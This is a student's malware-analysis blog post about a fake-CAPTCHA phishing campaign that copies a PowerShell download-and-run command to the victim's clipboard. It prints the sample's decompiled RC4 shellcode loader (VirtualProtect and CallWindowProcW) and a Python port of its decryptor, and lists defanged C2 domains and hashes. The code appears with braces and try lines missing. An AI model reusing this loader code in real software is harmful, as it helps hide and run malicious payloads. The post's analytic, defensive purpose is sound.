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Operator in Cookie Han Hoan
Admin in Cyber Mely, CyberSpace
Forensic at @World Wide Flags

Malware Analysis - Real Case 6


Hi everyone, it’s me again, Odin. Today is a special day with me when I’ve got scholarship from USTH - my school and I found another interesting case when I was waiting for scholarship. Go with me and see if there’s any funny thing, let’s go 😂😂😂


First, this is the post led me to write this post:


According to Mr Ngan, there’s an email which sent a fake Github link:


I accessed it and I saw a robot-verification screen (it’s down now so I cannot capture my screen for it, I will take Ngan’s image):


If you click I’m not a robot button, it will attach a Powershell command to clipboard:


It will download a file name download.txt, I downloaded it and this is the file content:


You can see that it will download a program named l6E.exe, store it in \TEMP\SysSetup.exe and then run it. Now let’s see what inside the program. First, always check program information by using exiftool and file:


It’s a .NET program, so we can use dnSpy to reverse:


// AVP.Program
// Token: 0x0600000C RID: 12 RVA: 0x00053BD0 File Offset: 0x00051DD0
private static void Main(string[] args)
	new Resolver("Consulter", 100);
		Program.PersonalActivation(new List<int>(), Program.AIOsncoiuuA, Program.Alco);
		Program.PersonalActivation(new List<int>(), MoveAngles.userBuffer, MoveAngles.key);
	uint num = 0U;
	Program.VirtualProtect(ref Program.AIOsncoiuuA[0], Program.AIOsncoiuuA.Length, 64U, ref num);
	int num2 = 392;
	Program.CallWindowProcW(ref Program.AIOsncoiuuA[num2], MoveAngles.userBuffer, 0, 0, 0);

Let’s analyse main function: it will execute functions following this order: Resolver -> FreeConsole -> UAdhuyichgAUIshuiAuis -> PersonalActivation -> VirtualProtect -> CallWindowProcW. The most suspicious function here is PersonalActivation which processed two parameters in each time:

public static void PersonalActivation(List<int> aaa, byte[] ioAHsiujxhbiAIkao, byte[] key)
	byte[] array = new byte[256];
	byte[] array2 = new byte[256];
	int i;
	for (i = 0; i < 256; i++)
		array[i] = byte.Parse(i.ToString());
		int num = 112643575;
		uint num2 = 559148582U;
		uint num3 = 187982529U;
		uint num4 = 1563534896U;
		uint num5 = 1953161141U;
		int num6 = 2075696868;
		uint num7 = 283774760U;
		uint num8 = 1504728650U;
		uint num9 = 972316772U;
		uint num10 = 550482091U;
		int num11 = (int)(num2 / num9);
		uint num12 = num8 - num4;
		uint num13 = (uint)(num - num);
		num8 = num12 / num8;
		if (num10 < num2)
			num7 = (uint)(num6 * num);
		if ((long)num6 < (long)((ulong)num10))
			num9 = (uint)((long)num - (long)((ulong)num4));
			uint num14 = (uint)((ulong)num3 * (ulong)((long)num));
		if ((ulong)num5 >= (ulong)((long)num11))
			num12 = num13 / num7;
		array2[i] = key[i % key.Length];
	i = 0;
	int num15 = 0;
	while (i < 256)
		num15 = (num15 + (int)array[i] + (int)array2[i]) % 256;
		byte b = array[i];
		array[i] = array[num15];
		array[num15] = b;
	i = 0;
	num15 = 0;
	for (int j = 0; j < ioAHsiujxhbiAIkao.Length; j++)
		int num16 = 1677890457;
		uint num17 = 970823212U;
		int num18 = 2032724462;
		uint num19 = 996749628U;
		int num20 = 54179042;
		num16 = (int)((ulong)num19 * (ulong)((long)num16));
		uint num21 = (uint)((long)num18 * (long)((ulong)num17));
		num18 = (int)((ulong)num21 ^ (ulong)((long)num20));
		num20 = (int)((ulong)num19 ^ (ulong)((long)num20));
		i = (i + 1) % 256;
		num15 = (num15 + (int)array[i]) % 256;
		byte b2 = array[i];
		array[i] = array[num15];
		array[num15] = b2;
		int num22 = (int)(array[i] + array[num15]) % 256;
			uint num23 = 726649612U;
			uint num24 = 1655325590U;
			uint num25 = 2044885176U;
			int num26 = 142885486;
			uint num27 = 323723604U;
			int num28 = 1956001745;
			long num29 = (long)num26 / (long)((ulong)num24);
			ulong num30 = (ulong)num27 / (ulong)((long)num28);
			if (num23 >= num25)
				num27 = (uint)(num28 / num28);
			int num31 = 0;
			int num32 = 0;
			int.TryParse(j.ToString(), out num31);
			int.TryParse(num22.ToString(), out num32);
			int num33 = num31;
			ioAHsiujxhbiAIkao[num33] ^= array[num32];
		catch (Exception ex)
			throw ex;

I’m sure after this function is run, it will create something that’s not good, so I rewrote this script in Python and try to decrypt all:

def PersonalActivation(aaa: list, ioAHsiujxhbiAIkao: bytearray, key: bytearray):
    array = bytearray(256)
    array2 = bytearray(256)
    for i in range(256):
        array[i] = i
        num = 112643575
        num2 = 559148582
        num3 = 187982529
        num4 = 1563534896
        num5 = 1953161141
        num6 = 2075696868
        num7 = 283774760
        num8 = 1504728650
        num9 = 972316772
        num10 = 550482091
        num11 = num2 // num9
        num12 = num8 - num4
        num13 = num - num
        num8 = num12 // num8
        if num10 < num2:
            num7 = num6 * num
        if num6 < num10:
            num9 = num - num4
            num14 = num3 * num
        if num5 >= num11:
            num12 = num13 // num7
        array2[i] = key[i % len(key)]
    i = 0
    num15 = 0
    for i in range(256):
        num15 = (num15 + array[i] + array2[i]) % 256
        array[i], array[num15] = array[num15], array[i]
    i = 0
    num15 = 0
    for j in range(len(ioAHsiujxhbiAIkao)):
        num16 = 1677890457
        num17 = 970823212
        num18 = 2032724462
        num19 = 996749628
        num20 = 54179042
        num16 = (num19 * num16) % (2**32)
        num21 = (num18 * num17) % (2**32)
        num18 = (num21 ^ num20) % (2**32)
        num20 = (num19 ^ num20) % (2**32)
        i = (i + 1) % 256
        num15 = (num15 + array[i]) % 256
        array[i], array[num15] = array[num15], array[i]
        num22 = (array[i] + array[num15]) % 256
            num23 = 726649612
            num24 = 1655325590
            num25 = 2044885176
            num26 = 142885486
            num27 = 323723604
            num28 = 1956001745
            num29 = num26 // num24
            num30 = num27 // num28
            if num23 >= num25:
                num27 = num28 // num28
            num31 = j
            num32 = num22
            ioAHsiujxhbiAIkao[num31] ^= array[num32]
        except Exception as ex:
            raise ex
    for i in ioAHsiujxhbiAIkao:
        print(chr(i), end='')

With the first time it ran, it took two parameters: Program.AIOsncoiuuA and Program.Alco which contain byte arrays:


With the script I wrote, I tried to decrypt it and found an interesting thing:


It seems to contain some WinAPIs and files like: user32.dll, CreateProcessA, VirtualAlloc… I think it will be a part of another malicious files. Next with the last call I had difficulty because of not displaying fully:


At first I intended to give up but fortunately my big brother: tr4c3datr4il gave me an important hint:


According to him, because the variable is constant, it will exist inside the program. Now this is how to extract data fully:

  • Go to CyberChef, convert program to hex values: image
  • Next, I will try to take some values from variable and search it in program, and I really found it:



  • I extracted data by writing another Python script:


  • Decrypt and I got another exe file:


From here I used any.run to run it:



DNS requests:

  • eemmbryequo[.]shop
  • keennylrwmqlw[.]shop
  • tesecuuweqo[.]shop
  • relaxatinownio[.]shop
  • tendencctywop[.]shop
  • licenseodqwmqn[.]shop
  • reggwardssdqw[.]shop
  • genedjestytw[.]shop
  • tryyudjasudqo[.]shop
  • steamcommunity[.]com

    Dropped files:
  • payload.exe (SHA256: 5aead2773474aa64c7e5300d49eca7ee01174fe806fd73f4a878ae4b2a4aaca1)
  • payload2 (SHA256: ad297e69088683dbc3d8fe1f9d67a9dbf36931e9a46e66533d62cfcf430ea618)

This is all my process so far. Thank you very much for reading till this line, if you love this article, please share it to your friend or other people so that everyone can be safe on the Internet. See you in the future posts, bye bye! 🫀🫀🫀

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